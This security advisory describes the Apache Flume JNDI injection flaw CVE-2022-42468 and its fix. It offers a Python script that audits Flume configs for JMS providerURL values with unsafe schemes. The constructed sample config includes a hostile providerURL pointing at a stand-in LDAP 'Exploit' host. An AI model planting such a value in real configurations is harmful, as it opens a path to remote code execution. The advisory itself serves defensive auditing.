CVE-2022-42468: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
Apache Flume versions 1.4.0 through 1.10.1 are vulnerable to remote code execution (RCE) when a configuration uses a JMS Source with an unsafe providerURL. The source passes that value to a JNDI InitialContext as the provider URL, so a providerURL that names a remote naming service (an ldap:// or rmi:// URL, for example) lets whoever controls that service return a reference that loads attacker-supplied classes into the agent process. The fix (Flume 1.11.0, FLUME-3437) limits JNDI to the java protocol or no protocol. Until an agent is upgraded, treat its configuration as a trust boundary: anyone who can write the agent's properties file, or the system that generates it, can supply the providerURL.
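The following audit script is an added example written for this advisory; it is not code from Apache Flume. It parses a Flume agent properties file, finds JMS sources, and applies the same allow-list the fix describes (only the java scheme, or no scheme at all) to each providerURL. The scheme is extracted the way the JDK's own InitialContext does it (text before the first ':' when that ':' precedes any '/'), which is conservative: a bare host:port value comes out as a scheme and is flagged for review rather than passed. The property names follow the Flume JMS source documentation; the sample configuration at the bottom is constructed.

```python
"""Audit a Flume agent properties file for JMS sources whose JNDI providerURL
carries a scheme other than java: (the allow-list the CVE-2022-42468 fix uses).

Added example for this advisory, not code from Apache Flume. The sample
configuration at the bottom is constructed for illustration.
"""
import re

# <agent>.sources.<source>.<property> = <value>, as in a Flume agent config.
_SOURCE_PROP = re.compile(
    r"^(?P<agent>[\w-]+)\.sources\.(?P<src>[\w-]+)\.(?P<key>[\w.]+)\s*=\s*(?P<val>.*?)\s*$"
)


def parse_sources(conf_text):
    """Return {(agent, source): {property: value}} for every *.sources.* line."""
    sources = {}
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", "!")):  # Java properties comments
            continue
        m = _SOURCE_PROP.match(line)
        if m:
            sources.setdefault((m["agent"], m["src"]), {})[m["key"]] = m["val"]
    return sources


def url_scheme(value):
    """Scheme of a JNDI URL string, lower-cased, or '' when there is none.

    Mirrors javax.naming.InitialContext.getURLScheme: the text before the
    first ':' is the scheme when that ':' comes before any '/'. A bare
    host:port value therefore yields a "scheme" and gets flagged below;
    review such values by hand rather than widening the allow-list.
    """
    s = value.strip()
    colon, slash = s.find(":"), s.find("/")
    if colon > 0 and (slash == -1 or colon < slash):
        return s[:colon].lower()
    return ""


def provider_url_allowed(value):
    """The allow-list from the fix: only the java scheme, or no scheme at all.

    Anything else (ldap, ldaps, rmi, iiop, http, ...) would let the JNDI
    context contact a naming service chosen by the URL, which is the RCE path.
    """
    return url_scheme(value) in ("", "java")


def audit_jms_sources(conf_text):
    """List (agent, source, providerURL) for every JMS source failing the check."""
    findings = []
    for (agent, src), props in sorted(parse_sources(conf_text).items()):
        if props.get("type", "").strip().lower() != "jms":
            continue
        url = props.get("providerURL", "")
        if not provider_url_allowed(url):
            findings.append((agent, src, url))
    return findings


# Constructed sample: r1 is acceptable, r2 has been pointed at an LDAP server
# (the address is a documentation-reserved IP, not a real host).
SAMPLE_CONF = """\
# agent a1 - constructed example, not a production config
a1.sources = r1 r2
a1.sources.r1.type = jms
a1.sources.r1.initialContextFactory = org.apache.activemq.jndi.ActiveMQInitialContextFactory
a1.sources.r1.providerURL = java:comp/env/jms
a1.sources.r1.connectionFactory = GenericConnectionFactory
a1.sources.r1.destinationName = BUSINESS_DATA
a1.sources.r1.destinationType = QUEUE

a1.sources.r2.type = jms
a1.sources.r2.initialContextFactory = com.sun.jndi.ldap.LdapCtxFactory
a1.sources.r2.providerURL = ldap://198.51.100.23:1389/Exploit
a1.sources.r2.connectionFactory = GenericConnectionFactory
a1.sources.r2.destinationName = BUSINESS_DATA
a1.sources.r2.destinationType = QUEUE
"""

if __name__ == "__main__":
    for agent, src, url in audit_jms_sources(SAMPLE_CONF):
        print(f"{agent}.sources.{src}: providerURL {url!r} uses a non-java scheme")
```

Run it against each agent's properties file (one call to `audit_jms_sources` per file); an empty result means every JMS source already satisfies the rule the fix enforces, a non-empty one lists the sources to reconfigure before, or alongside, the upgrade to a fixed release.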
References
- github.com/advisories/GHSA-9w4g-fp9h-3q2v
- github.com/apache/flume/commit/eee179a09df405c1ab55ae25a53b76ca1050bb97
- issues.apache.org/jira/browse/FLUME-3437
- lists.apache.org/thread/1ckhmp539zr2nd2rs45pocpywk2d9zvz
- lists.apache.org/thread/939wkx8o90bp6m2ht3t1sdyo1ncypl78
- nvd.nist.gov/vuln/detail/CVE-2022-42468